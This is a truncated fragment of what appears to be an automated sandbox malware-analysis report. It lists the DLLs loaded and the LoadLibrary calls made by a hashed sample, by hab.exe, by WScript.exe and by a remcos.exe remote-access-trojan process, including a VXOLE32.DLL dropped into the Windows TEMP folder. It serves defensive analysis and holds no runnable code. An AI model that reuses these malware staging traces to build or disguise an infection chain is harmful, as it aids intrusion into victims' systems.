\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71b50000\n \"hab.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71250000\n \"hab.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hab.exe\" loaded module \"KERNEL32\" at base 75df0000\n \"hab.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 744b0000\n \"hab.exe\" loaded module \"OLEAUT32.DLL\" at base 778a0000\n \"hab.exe\" loaded module \"SXS.DLL\" at base 75550000\n \"hab.exe\" loaded module \"CRYPTSP.DLL\" at base 75050000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74de0000\n \"hab.exe\" loaded module \"ADVAPI32.DLL\" at base 775f0000\n \"hab.exe\" loaded module \"CRYPTBASE.DLL\" at base 75540000\n \"hab.exe\" loaded module \"DWMAPI.DLL\" at base 73ea0000\n \"hab.exe\" loaded module \"COMCTL32\" at base 74540000\n \"hab.exe\" loaded module \"UXTHEME.DLL\" at base 744b0000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 761c0000\n \"hab.exe\" loaded module \"CLBCATQ.DLL\" at base 75ed0000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 763f0000\n \"hab.exe\" loaded module \"SHELL32\" at base 764c0000\n \"hab.exe\" loaded module \"NTDLL\" at base 77740000\n \"hab.exe\" loaded module \"IPHLPAPI\" at base 737b0000\n \"hab.exe\" loaded module \"ADVAPI32\" at base 775f0000\n \"hab.exe\" loaded module \"DHCPCSVC.DLL\" at base 735a0000\n \"hab.exe\" loaded module \"IPHLPAPI.DLL\" at base 737b0000\n \"hab.exe\" loaded module \"RPCRT4.DLL\" at base 75980000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 754f0000\n \"hab.exe\" loaded module \"KERNEL32.DLL\" at base 75df0000\n \"hab.exe\" loaded module \"USER32.DLL\" at base 76320000\n \"hab.exe\" loaded module \"GDI32.DLL\" at base 760c0000\n \"hab.exe\" loaded module \"SHELL32.DLL\" at base 764c0000\n \"hab.exe\" loaded module \"MSVCRT.DLL\" at base 76110000\n \"hab.exe\" loaded module \"MSVCP60.DLL\" at base 6a5c0000\n \"hab.exe\" loaded module \"SHLWAPI.DLL\" at base 75ab0000\n \"hab.exe\" loaded module \"WINMM.DLL\" at base 6e800000\n \"hab.exe\" loaded module \"WS2_32.DLL\" at base 75db0000\n \"hab.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75920000\n \"hab.exe\" loaded module \"URLMON.DLL\" at base 75f60000\n \"hab.exe\" loaded module \"GDIPLUS.DLL\" at base 73ff0000\n \"hab.exe\" loaded module \"WININET.DLL\" at base 77110000\n \"hab.exe\" loaded module \"PSAPI.DLL\" at base 77890000\n \"hab.exe\" loaded module \"OLE32.DLL\" at base 761c0000\n \"hab.exe\" loaded module \"PROPSYS.DLL\" at base 74190000\n \"hab.exe\" loaded module \"COMCTL32.DLL\" at base 74540000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74190000\n \"hab.exe\" loaded module \"NTMARTA.DLL\" at base 74ab0000\n \"hab.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77960000\n \"hab.exe\" loaded module \"PROFAPI.DLL\" at base 75660000\n \"hab.exe\" loaded module \"APPHELP.DLL\" at base 754f0000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6edd0000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 764c0000\n \"hab.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75df0000\n \"hab.exe\" loaded module \"SETUPAPI.DLL\" at base 773f0000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75f60000\n \"hab.exe\" loaded module \"SECUR32.DLL\" at base 75380000\n \"hab.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75930000\n \"hab.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71b50000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71250000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WScript.exe\" loaded module \"KERNEL32\" at base 75df0000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WScript.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a6b0000\n \"WScript.exe\" loaded module \"RPCRT4.DLL\" at base 75980000\n \"WScript.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77960000\n \"WScript.exe\" loaded module \"ADVAPI32.DLL\" at base 775f0000\n \"WScript.exe\" loaded module \"KERNEL32.DLL\" at base 75df0000\n \"WScript.exe\" loaded module \"SXS.DLL\" at base 75550000\n \"WScript.exe\" loaded module \"DWMAPI.DLL\" at base 73ea0000\n \"WScript.exe\" loaded module \"CLBCATQ.DLL\" at base 75ed0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\VBSCRIPT.DLL\" at base 6a5b0000\n \"WScript.exe\" loaded module \"OLE32.DLL\" at base 761c0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ADVAPI32.DLL\" at base 775f0000\n \"WScript.exe\" loaded module \"WINTRUST.DLL\" at base 758f0000\n \"WScript.exe\" loaded module \"CRYPTSP.DLL\" at base 75050000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74de0000\n \"WScript.exe\" loaded module \"CRYPTBASE.DLL\" at base 75540000\n \"WScript.exe\" loaded module \"MSISIP.DLL\" at base 6d320000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CRYPT32.DLL\" at base 75670000\n \"WScript.exe\" loaded module \"IMM32.DLL\" at base 77940000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHEXT.DLL\" at base 6bb40000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCROBJ.DLL\" at base 6a730000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MLANG.DLL\" at base 6a700000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCRRUN.DLL\" at base 6a440000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHOM.OCX\" at base 691f0000\n \"WScript.exe\" loaded module \"SHELL32.DLL\" at base 764c0000\n \"WScript.exe\" loaded module \"PROPSYS.DLL\" at base 74190000\n \"WScript.exe\" loaded module \"COMCTL32.DLL\" at base 74540000\n \"WScript.exe\" loaded module \"OLEAUT32.DLL\" at base 778a0000\n \"WScript.exe\" loaded module \"APPHELP.DLL\" at base 754f0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a900000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75df0000\n \"WScript.exe\" loaded module \"SETUPAPI.DLL\" at base 773f0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74190000\n \"WScript.exe\" loaded module \"NTMARTA.DLL\" at base 74ab0000\n \"WScript.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77960000\n \"WScript.exe\" loaded module \"PROFAPI.DLL\" at base 75660000\n \"WScript.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75920000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75f60000\n \"WScript.exe\" loaded module \"SECUR32.DLL\" at base 75380000\n \"WScript.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75930000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 754f0000\n \"cmd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 754f0000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74de0000\n \"remcos.exe\" loaded module \"ADVAPI32.DLL\" at base 775f0000\n \"remcos.exe\" loaded module \"CRYPTBASE.DLL\" at base 75540000\n \"remcos.exe\" loaded module \"DWMAPI.DLL\" at base 73ea0000\n \"remcos.exe\" loaded module \"COMCTL32\" at base 74540000\n \"remcos.exe\" loaded module \"UXTHEME.DLL\" at base 744b0000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 761c0000\n \"remcos.exe\" loaded module \"CLBCATQ.DLL\" at base 75ed0000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 763f0000\n \"remcos.exe\" loaded module \"SHELL32\" at base 764c0000\n \"remcos.exe\" loaded module \"KERNEL32\" at base 75df0000\n \"remcos.exe\" loaded module \"NTDLL\" at base 77740000\n \"remcos.exe\" loaded module \"IPHLPAPI\" at base 737b0000\n \"remcos.exe\" loaded module \"ADVAPI32\" at base 775f0000\n \"remcos.exe\" loaded module \"DHCPCSVC.DLL\" at base 735a0000\n \"remcos.exe\" loaded module \"IPHLPAPI.DLL\" at base 737b0000\n \"remcos.exe\" loaded module \"RPCRT4.DLL\" at base 75980000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 754f0000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71250000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"remcos.exe\" loaded module \"OLE32.DLL\" at base 761c0000\n \"remcos.exe\" loaded module \"PROPSYS.DLL\" at base 74190000\n \"remcos.exe\" loaded module \"COMCTL32.DLL\" at base 74540000\n \"remcos.exe\" loaded module \"OLEAUT32.DLL\" at base 778a0000\n \"remcos.exe\" loaded module \"SHELL32.DLL\" at base 764c0000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74190000\n \"remcos.exe\" loaded module \"NTMARTA.DLL\" at base 74ab0000\n \"remcos.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77960000\n \"remcos.exe\" loaded module \"PROFAPI.DLL\" at base 75660000\n \"remcos.exe\" loaded module \"APPHELP.DLL\" at base 754f0000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6edd0000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 764c0000\n \"remcos.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75df0000\n \"remcos.exe\" loaded module \"SETUPAPI.DLL\" at base 773f0000\n \"remcos.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75920000\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 75f60000\n \"remcos.exe\" loaded module \"SECUR32.DLL\" at base 75380000\n \"remcos.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75930000\n \"remcos.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71b50000\n \"hab.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b650000\n \"hab.exe\" loaded module \"MSVCP60.DLL\" at base 691b0000\n \"WScript.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b650000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 744b0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\VBSCRIPT.DLL\" at base 69130000\n \"WScript.exe\" loaded module \"MSISIP.DLL\" at base 6e150000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHEXT.DLL\" at base 6d530000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCROBJ.DLL\" at base 6d430000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MLANG.DLL\" at base 6b620000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCRRUN.DLL\" at base 6a6d0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHOM.OCX\" at base 6a600000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71250000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 75df0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"remcos.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 744b0000\n \"remcos.exe\" loaded module \"SXS.DLL\" at base 75550000\n \"remcos.exe\" loaded module \"CRYPTSP.DLL\" at base 75050000\n \"hab.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a6c0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\VBSCRIPT.DLL\" at base 691a0000\n \"WScript.exe\" loaded module \"MSISIP.DLL\" at base 6e070000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHEXT.DLL\" at base 6d440000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MLANG.DLL\" at base 6a600000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCRRUN.DLL\" at base 6a5d0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHOM.OCX\" at base 6a5a0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005840)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter GDI32.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter MSVCP60.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WINMM.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter gdiplus.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WININET.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter User32.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter Psapi.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00006072)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter 